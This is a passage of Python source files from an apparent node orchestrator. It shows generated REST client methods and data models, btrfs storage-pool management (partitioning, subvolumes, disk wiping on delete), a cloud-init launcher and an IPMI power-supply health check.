It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}/snapshots
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname+"/snapshots"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateSnapshot(self, data, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create a new read-only snapshot of the current state of the vdisk
It is method for POST /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}/snapshots
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname+"/snapshots"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteFilesystem(self, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete file system
It is method for DELETE /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname
return self.client.delete(uri, None, headers, query_params, content_type)
def GetFilesystemInfo(self, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed file system information
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname
return self.client.get(uri, None, headers, query_params, content_type)
def ListFilesystems(self, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List all file systems
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateFilesystem(self, data, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create a new file system
It is method for POST /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteStoragePool(self, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete the storage pool
It is method for DELETE /nodes/{nodeid}/storagepools/{storagepoolname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname
return self.client.delete(uri, None, headers, query_params, content_type)
def GetStoragePoolInfo(self, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of this storage pool
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname
return self.client.get(uri, None, headers, query_params, content_type)
def ListStoragePools(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List storage pools present in the node
It is method for GET /nodes/{nodeid}/storagepools
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateStoragePool(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create a new storage pool in the node
It is method for POST /nodes/{nodeid}/storagepools
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools"
return self.client.post(uri, data, headers, query_params, content_type)
def ImportVM(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Import the virtual machine from ftp server
It is method for POST /nodes/{nodeid}/vms/import
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/import"
return self.client.post(uri, data, headers, query_params, content_type)
def ExportVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Export the virtual machine to ftp server
It is method for POST /nodes/{nodeid}/vms/{vmid}/export
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/export"
return self.client.post(uri, data, headers, query_params, content_type)
def GetVMInfo(self, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get statistical information about the virtual machine.
It is method for GET /nodes/{nodeid}/vms/{vmid}/info
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/info"
return self.client.get(uri, None, headers, query_params, content_type)
def MigrateVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Migrate the virtual machine to another host
It is method for POST /nodes/{nodeid}/vms/{vmid}/migrate
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/migrate"
return self.client.post(uri, data, headers, query_params, content_type)
def PauseVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Pauses the VM
It is method for POST /nodes/{nodeid}/vms/{vmid}/pause
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/pause"
return self.client.post(uri, data, headers, query_params, content_type)
def ResumeVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Resumes the virtual machine
It is method for POST /nodes/{nodeid}/vms/{vmid}/resume
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/resume"
return self.client.post(uri, data, headers, query_params, content_type)
def ShutdownVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Gracefully shutdown the virtual machine
It is method for POST /nodes/{nodeid}/vms/{vmid}/shutdown
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/shutdown"
return self.client.post(uri, data, headers, query_params, content_type)
def StartVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Start the virtual machine
It is method for POST /nodes/{nodeid}/vms/{vmid}/start
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/start"
return self.client.post(uri, data, headers, query_params, content_type)
def StopVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Stops the VM
It is method for POST /nodes/{nodeid}/vms/{vmid}/stop
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/stop"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteVM(self, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Deletes the virtual machine
It is method for DELETE /nodes/{nodeid}/vms/{vmid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetVM(self, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get the virtual machine object
It is method for GET /nodes/{nodeid}/vms/{vmid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid
return self.client.get(uri, None, headers, query_params, content_type)
def UpdateVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Updates the virtual machine
It is method for PUT /nodes/{nodeid}/vms/{vmid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid
return self.client.put(uri, data, headers, query_params, content_type)
def ListVMs(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List all virtual machines
It is method for GET /nodes/{nodeid}/vms
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateVM(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Creates a new virtual machine
It is method for POST /nodes/{nodeid}/vms
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms"
return self.client.post(uri, data, headers, query_params, content_type)
def ExitZerotier(self, zerotierid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Exit the ZeroTier network
It is method for DELETE /nodes/{nodeid}/zerotiers/{zerotierid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/zerotiers/"+zerotierid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetZerotier(self, zerotierid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get ZeroTier network details
It is method for GET /nodes/{nodeid}/zerotiers/{zerotierid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/zerotiers/"+zerotierid
return self.client.get(uri, None, headers, query_params, content_type)
def ListZerotier(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List running ZeroTier networks
It is method for GET /nodes/{nodeid}/zerotiers
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/zerotiers"
return self.client.get(uri, None, headers, query_params, content_type)
def JoinZerotier(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Join ZeroTier network
It is method for POST /nodes/{nodeid}/zerotiers
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/zerotiers"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteNode(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete a node
It is method for DELETE /nodes/{nodeid}
"""
uri = self.client.base_url + "/nodes/"+nodeid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetNode(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of a node
It is method for GET /nodes/{nodeid}
"""
uri = self.client.base_url + "/nodes/"+nodeid
return self.client.get(uri, None, headers, query_params, content_type)
def ListNodes(self, headers=None, query_params=None, content_type="application/json"):
"""
List all nodes
It is method for GET /nodes
"""
uri = self.client.base_url + "/nodes"
return self.client.get(uri, None, headers, query_params, content_type)
```
#### File: orchestrator/client/PortForward.py
```python
from .IPProtocol import IPProtocol
from . import client_support
class PortForward(object):
"""
auto-generated. don't touch.
"""
@staticmethod
def create(dstip, dstport, protocols, srcip, srcport):
"""
:type dstip: str
:type dstport: int
:type protocols: list[IPProtocol]
:type srcip: str
:type srcport: int
:rtype: PortForward
"""
return PortForward(
dstip=dstip,
dstport=dstport,
protocols=protocols,
srcip=srcip,
srcport=srcport,
)
def __init__(self, json=None, **kwargs):
if json is None and not kwargs:
raise ValueError('No data or kwargs present')
class_name = 'PortForward'
create_error = '{cls}: unable to create {prop} from value: {val}: {err}'
required_error = '{cls}: missing required property {prop}'
data = json or kwargs
property_name = 'dstip'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.dstip = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'dstport'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.dstport = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'protocols'
val = data.get(property_name)
if val is not None:
datatypes = [IPProtocol]
try:
self.protocols = client_support.list_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'srcip'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.srcip = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'srcport'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.srcport = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
def __str__(self):
return self.as_json(indent=4)
def as_json(self, indent=0):
return client_support.to_json(self, indent=indent)
def as_dict(self):
return client_support.to_dict(self)
```
#### File: orchestrator/client/webhooks_service.py
```python
class WebhooksService:
def __init__(self, client):
self.client = client
def DeleteWebhook(self, webhookname, headers=None, query_params=None, content_type="application/json"):
"""
Delete a webhook
It is method for DELETE /webhooks/{webhookname}
"""
uri = self.client.base_url + "/webhooks/"+webhookname
return self.client.delete(uri, None, headers, query_params, content_type)
def GetWebhook(self, webhookname, headers=None, query_params=None, content_type="application/json"):
"""
Get a webhook
It is method for GET /webhooks/{webhookname}
"""
uri = self.client.base_url + "/webhooks/"+webhookname
return self.client.get(uri, None, headers, query_params, content_type)
def UpdateWebhook(self, data, webhookname, headers=None, query_params=None, content_type="application/json"):
"""
Update a webhook
It is method for PUT /webhooks/{webhookname}
"""
uri = self.client.base_url + "/webhooks/"+webhookname
return self.client.put(uri, data, headers, query_params, content_type)
def ListWebhooks(self, headers=None, query_params=None, content_type="application/json"):
"""
List all webhooks
It is method for GET /webhooks
"""
uri = self.client.base_url + "/webhooks"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateWebhook(self, data, headers=None, query_params=None, content_type="application/json"):
"""
Create Webhook
It is method for POST /webhooks
"""
uri = self.client.base_url + "/webhooks"
return self.client.post(uri, data, headers, query_params, content_type)
```
#### File: orchestrator/client/Zerotier.py
```python
from .EnumZerotierType import EnumZerotierType
from .ZerotierRoute import ZerotierRoute
from . import client_support
class Zerotier(object):
"""
auto-generated. don't touch.
"""
@staticmethod
def create(allowDefault, allowGlobal, allowManaged, assignedAddresses, bridge, broadcastEnabled, dhcp, mac, mtu, name, netconfRevision, nwid, portDeviceName, portError, routes, status, type):
"""
:type allowDefault: bool
:type allowGlobal: bool
:type allowManaged: bool
:type assignedAddresses: list[str]
:type bridge: bool
:type broadcastEnabled: bool
:type dhcp: bool
:type mac: str
:type mtu: int
:type name: str
:type netconfRevision: int
:type nwid: str
:type portDeviceName: str
:type portError: int
:type routes: list[ZerotierRoute]
:type status: str
:type type: EnumZerotierType
:rtype: Zerotier
"""
return Zerotier(
allowDefault=allowDefault,
allowGlobal=allowGlobal,
allowManaged=allowManaged,
assignedAddresses=assignedAddresses,
bridge=bridge,
broadcastEnabled=broadcastEnabled,
dhcp=dhcp,
mac=mac,
mtu=mtu,
name=name,
netconfRevision=netconfRevision,
nwid=nwid,
portDeviceName=portDeviceName,
portError=portError,
routes=routes,
status=status,
type=type,
)
def __init__(self, json=None, **kwargs):
if json is None and not kwargs:
raise ValueError('No data or kwargs present')
class_name = 'Zerotier'
create_error = '{cls}: unable to create {prop} from value: {val}: {err}'
required_error = '{cls}: missing required property {prop}'
data = json or kwargs
property_name = 'allowDefault'
val = data.get(property_name)
if val is not None:
datatypes = [bool]
try:
self.allowDefault = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'allowGlobal'
val = data.get(property_name)
if val is not None:
datatypes = [bool]
try:
self.allowGlobal = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'allowManaged'
val = data.get(property_name)
if val is not None:
datatypes = [bool]
try:
self.allowManaged = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'assignedAddresses'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.assignedAddresses = client_support.list_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'bridge'
val = data.get(property_name)
if val is not None:
datatypes = [bool]
try:
self.bridge = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'broadcastEnabled'
val = data.get(property_name)
if val is not None:
datatypes = [bool]
try:
self.broadcastEnabled = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'dhcp'
val = data.get(property_name)
if val is not None:
datatypes = [bool]
try:
self.dhcp = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'mac'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.mac = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'mtu'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.mtu = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'name'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.name = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'netconfRevision'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.netconfRevision = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'nwid'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.nwid = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'portDeviceName'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.portDeviceName = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'portError'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.portError = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'routes'
val = data.get(property_name)
if val is not None:
datatypes = [ZerotierRoute]
try:
self.routes = client_support.list_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'status'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.status = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'type'
val = data.get(property_name)
if val is not None:
datatypes = [EnumZerotierType]
try:
self.type = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
def __str__(self):
return self.as_json(indent=4)
def as_json(self, indent=0):
return client_support.to_json(self, indent=indent)
def as_dict(self):
return client_support.to_dict(self)
```
#### File: sal/atyourservice/StoragePool.py
```python
from .abstracts import AYSable
from js9 import j
class StoragePoolAys(AYSable):
def __init__(self, storagepool):
self._obj = storagepool
self.actor = 'storagepool'
def create(self, aysrepo):
try:
service = aysrepo.serviceGet(role='storagepool', instance=self._obj.name)
except j.exceptions.NotFound:
service = None
device_map, pool_status = self._obj.get_devices_and_status()
if service is None:
# create new service
actor = aysrepo.actorGet(self.actor)
args = {
'metadataProfile': self._obj.fsinfo['metadata']['profile'],
'dataProfile': self._obj.fsinfo['data']['profile'],
'devices': device_map,
'node': self._node_name,
'status': pool_status,
}
service = actor.serviceCreate(instance=self._obj.name, args=args)
else:
# update model on exists service
service.model.data.init('devices', len(device_map))
for i, device in enumerate(device_map):
service.model.data.devices[i] = device
service.model.data.status = pool_status
service.saveAll()
return service
@property
def _node_name(self):
def is_valid_nic(nic):
for exclude in ['zt', 'core', 'kvm', 'lo']:
if nic['name'].startswith(exclude):
return False
return True
for nic in filter(is_valid_nic, self._obj.node.client.info.nic()):
if len(nic['addrs']) > 0 and nic['addrs'][0]['addr'] != '':
return nic['hardwareaddr'].replace(':', '')
raise AttributeError("name not find for node {}".format(self._obj.node))
class FileSystemAys(AYSable):
def __init__(self, filesystem):
self._obj = filesystem
self.actor = 'filesystem'
def create(self, aysrepo):
actor = aysrepo.actorGet(self.actor)
args = {
'storagePool': self._obj.pool.name,
'name': self._obj.name,
# 'readOnly': ,FIXME
# 'quota': ,FIXME
}
return actor.serviceCreate(instance=self._obj.name, args=args)
```
#### File: sal/gateway/cloudinit.py
```python
import time
class CloudInit:
def __init__(self, container, config):
self.container = container
self.config = config
self.CONFIGPATH = "/etc/cloud-init"
def apply_config(self):
self.cleanup(self.config.keys())
for key, value in self.config.items():
fpath = "%s/%s" % (self.CONFIGPATH, key)
self.container.upload_content(fpath, value)
if not self.is_running():
self.start()
def cleanup(self, macaddresses):
configs = self.container.client.filesystem.list(self.CONFIGPATH)
for config in configs:
if config["name"] not in macaddresses:
self.container.client.filesystem.remove("%s/%s" % (self.CONFIGPATH, config["name"]))
def start(self):
if not self.is_running():
self.container.client.system(
'cloud-init-server \
-bind 127.0.0.1:8080 \
-config {config}'
.format(config=self.CONFIGPATH),
id='cloudinit.{}'.format(self.container.name))
start = time.time()
while time.time() < start + 10:
if self.is_running():
return
time.sleep(0.5)
raise RuntimeError('Failed to start cloudinit server')
def is_running(self):
for port in self.container.client.info.port():
if port['network'] == 'tcp' and port['port'] == 8080 and port['ip'] == '127.0.0.1':
return True
return False
```
#### File: sal/healthchecks/powersupply.py
```python
from ..healthcheck import IPMIHealthCheck
descr = """
Checks the power redundancy of a node using IPMItool.
Result will be shown in the "Hardware" section of the Grid Portal / Status Overview / Node Status page.
"""
class PowerSupply(IPMIHealthCheck):
def __init__(self, node):
resource = '/nodes/{}'.format(node.name)
super().__init__(id='pw-supply', name='Power Supply', category="Hardware", resource=resource)
self.node = node
self.ps_errmsgs = [
"Power Supply AC lost",
"Failure detected",
"Predictive failure",
"AC lost or out-of-range",
"AC out-of-range, but present",
"Config Erro",
"Power Supply Inactive"]
def run(self, container):
ps_errmsgs = [x.lower() for x in self.ps_errmsgs if x.strip()]
linehaserrmsg = lambda line: any([x in line.lower() for x in ps_errmsgs])
out = self.execute_ipmi(container, """ipmitool -c sdr type "Power Supply" """)
if out:
# SAMPLE 1:
# root@du-conv-3-01:~# ipmitool -c sdr type "Power Supply"
# PS1 Status , C8h , ok , 10.1 , Presence detected
# PS2 Status,C9h , ok , 10.2 , Presence detected
# SAMPLE 2:
# root@stor-04:~# ipmitool -c sdr type "Power Supply"
# PSU1_Status , DEh , ok , 10.1 , Presence detected
# PSU2_Status , DFh , ns , 10.2 , No Reading
# PSU3_Status , E0h , ok , 10.3 , Presence detected
# PSU4_Status , E1h , ns , 10.4 , No Reading
# PSU Redundancy , E6h , ok , 21.1 , Fully Redundant
# SAMPLE 3:
# root@stor-01:~# ipmitool -c sdr type "Power Supply"
# PSU1_Status , DEh , ok , 10.1 , Presence detected , Power Supply AC lost
# PSU2_Status , DFh , ns , 10.2 , No Reading
# PSU3_Status , E0h , ok , 10.3 , Presence detected
# PSU4_Status , E1h , ok , 10.4 , Presence detected
# PSU Redundancy , E6h , ok , 21.1 , Redundancy Lost
# PSU Alert , 16h , ns , 208.1 , Event-Only
psu_redun_in_out = "PSU Redundancy".lower() in out.lower()
is_fully_redundant = True if "fully redundant" in out.lower() else False
for line in out.splitlines():
if "status" in line.lower():
parts = [part.strip() for part in line.split(",")]
id_, presence = parts[0], parts[-1]
id_ = id_.strip("Status").strip("_").strip() # clean the power supply name.
if linehaserrmsg(line):
if psu_redun_in_out and is_fully_redundant:
self.add_message(id=id_, status='SKIPPED', text="Power redundancy problem on %s (%s)" % (id_, presence))
else:
self.add_message(id=id_, status='WARNING', text="Power redundancy problem on %s (%s)" % (id_, presence))
else:
self.add_message(id=id_, status='OK', text="Power supply %s is OK" % id_)
else:
self.add_message(id="SKIPPED", status='SKIPPED', text="No data for Power Supplies")
```
#### File: orchestrator/sal/StoragePool.py
```python
from .abstracts import Mountable
import os
import time
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def _prepare_device(node, devicename):
logger.debug("prepare device %s", devicename)
ss = devicename.split('/')
if len(ss) < 3:
raise RuntimeError("bad device name: {}".format(devicename))
name = ss[2]
disk = node.disks.get(name)
if disk is None:
raise ValueError("device {} not found".format(name))
node.client.system('parted -s /dev/{} mklabel gpt mkpart primary 1m 100%'.format(name)).get()
now = time.time()
# check partitions is ready and writable
while now + 60 > time.time():
try:
disk = node.disks.get(name)
if len(disk.partitions) > 0:
partition = disk.partitions[0]
resp = node.client.bash('test -b {0} && dd if={0} of=/dev/null bs=4k count=1024'.format(partition.devicename)).get()
if resp.state == 'SUCCESS':
return partition
except:
time.sleep(1)
continue
else:
raise RuntimeError("Failed to create partition")
class StoragePools:
def __init__(self, node):
self.node = node
@property
def client(self):
return self.node.client
def list(self):
storagepools = []
btrfs_list = self.client.btrfs.list()
for btrfs in btrfs_list:
if btrfs['label'].startswith('sp_'):
name = btrfs['label'].split('_', 1)[1]
devicenames = [device['path'] for device in btrfs['devices']]
storagepools.append(StoragePool(self.node, name, devicenames))
return storagepools
def get(self, name):
for pool in self.list():
if pool.name == name:
return pool
raise ValueError("Could not find StoragePool with name {}".format(name))
def create(self, name, devices, metadata_profile, data_profile, overwrite=False):
label = 'sp_{}'.format(name)
logger.debug("create storagepool %s", label)
device_names = []
for device in devices:
part = _prepare_device(self.node, device)
device_names.append(part.devicename)
self.client.btrfs.create(label, device_names, metadata_profile, data_profile, overwrite=overwrite)
pool = StoragePool(self.node, name, device_names)
return pool
class StoragePool(Mountable):
def __init__(self, node, name, devices):
self.node = node
self.devices = devices
self.name = name
self._mountpoint = None
self._ays = None
@classmethod
def from_ays(cls, service, password, logger=None):
from .Node import Node
node = Node.from_ays(service.parent)
devices = []
for deviceObj in service.model.data.devices:
devices.append(deviceObj.device)
pool = cls(node=node,
name=service.name,
devices=devices)
return pool
@property
def client(self):
return self.node.client
@property
def devicename(self):
return 'UUID={}'.format(self.uuid)
def mount(self, target=None):
if target is None:
target = os.path.join('/mnt/storagepools/{}'.format(self.name))
return super().mount(target)
def delete(self, zero=True):
"""
Destroy storage pool
param zero: write zeros (nulls) to the first 500MB of each disk in this storagepool
"""
while self.mountpoint:
self.umount()
partitionmap = {}
for disk in self.node.disks.list():
for partition in disk.partitions:
partitionmap[partition.name] = partition
for device in self.devices:
diskpath = os.path.basename(device)
partition = partitionmap.get(diskpath)
if partition:
disk = partition.disk
self.client.disk.rmpart(disk.name, 1)
if zero:
self.client.bash('test -b /dev/{0} && dd if=/dev/zero bs=1M count=500 of=/dev/{0}'.format(diskpath)).get()
return
@property
def mountpoint(self):
mounts = self.node.list_mounts()
for device in self.devices:
for mount in mounts:
if mount.device == device:
options = mount.options.split(',')
if 'subvol=/' in options:
return mount.mountpoint
def is_device_used(self, device):
"""
check if the device passed as argument is already part of this storagepool
@param device: str e.g: /dev/sda
"""
for d in self.devices:
if d.startswith(device):
return True
return False
def device_add(self, *devices):
to_add = []
for device in devices:
if self.is_device_used(device):
continue
part = _prepare_device(self.node, device)
logger.debug("add device %s to %s", device, self)
to_add.append(part.devicename)
self.client.btrfs.device_add(self._get_mountpoint(), *to_add)
self.devices.extend(to_add)
def device_remove(self, *devices):
self.client.btrfs.device_remove(self._get_mountpoint(), *devices)
for device in devices:
if device in self.devices:
logger.debug("remove device %s to %s", device, self)
self.devices.remove(device)
@property
def fsinfo(self):
if self.mountpoint is None:
raise ValueError("can't get fsinfo if storagepool is not mounted")
return self.client.btrfs.info(self.mountpoint)
@mountpoint.setter
def mountpoint(self, value):
# do not do anything mountpoint is dynamic
return
def _get_mountpoint(self):
mountpoint = self.mountpoint
if not mountpoint:
raise RuntimeError("Can not perform action when filesystem is not mounted")
return mountpoint
@property
def info(self):
for fs in self.client.btrfs.list():
if fs['label'] == 'sp_{}'.format(self.name):
return fs
return None
def raw_list(self):
mountpoint = self._get_mountpoint()
return self.client.btrfs.subvol_list(mountpoint) or []
def get_devices_and_status(self):
device_map = []
disks = self.client.disk.list()['blockdevices']
pool_status = 'healthy'
for device in self.devices:
info = None
for disk in disks:
disk_name = "/dev/%s" % disk['kname']
if device == disk_name and disk['mountpoint']:
info = disk
break
for part in disk.get('children', []) or []:
if device == "/dev/%s" % part['kname']:
info = part
break
if info:
break
status = 'healthy'
if info['subsystems'] != 'block:virtio:pci':
result = self.client.bash("smartctl -H %s > /dev/null ;echo $?" % disk_name).get()
exit_status = int(result.stdout)
if exit_status & 1 << 0:
status = "unknown"
pool_status = 'degraded'
if (exit_status & 1 << 2) or (exit_status & 1 << 3):
status = 'degraded'
pool_status = 'degraded'
device_map.append({
'device': device,
'partUUID': info['partuuid'] or '' if info else '',
'status': status,
})
return device_map, pool_status
def list(self):
subvolumes = []
for subvol in self.raw_list():
path = subvol['Path']
type_, _, name = path.partition('/')
if type_ == 'filesystems':
subvolumes.append(FileSystem(name, self))
return subvolumes
def get(self, name):
"""
Get Filesystem
"""
for filesystem in self.list():
if filesystem.name == name:
return filesystem
raise ValueError("Could not find filesystem with name {}".format(name))
def exists(self, name):
"""
Check if filesystem with name exists
"""
for subvolume in self.list():
if subvolume.name == name:
return True
return False
def create(self, name, quota=None):
"""
Create filesystem
"""
logger.debug("Create filesystem %s on %s", name, self)
mountpoint = self._get_mountpoint()
fspath = os.path.join(mountpoint, 'filesystems')
self.client.filesystem.mkdir(fspath)
subvolpath = os.path.join(fspath, name)
self.client.btrfs.subvol_create(subvolpath)
if quota:
self.client.btrfs.subvol_quota(subvolpath, str(quota))
return FileSystem(name, self)
@property
def size(self):
total = 0
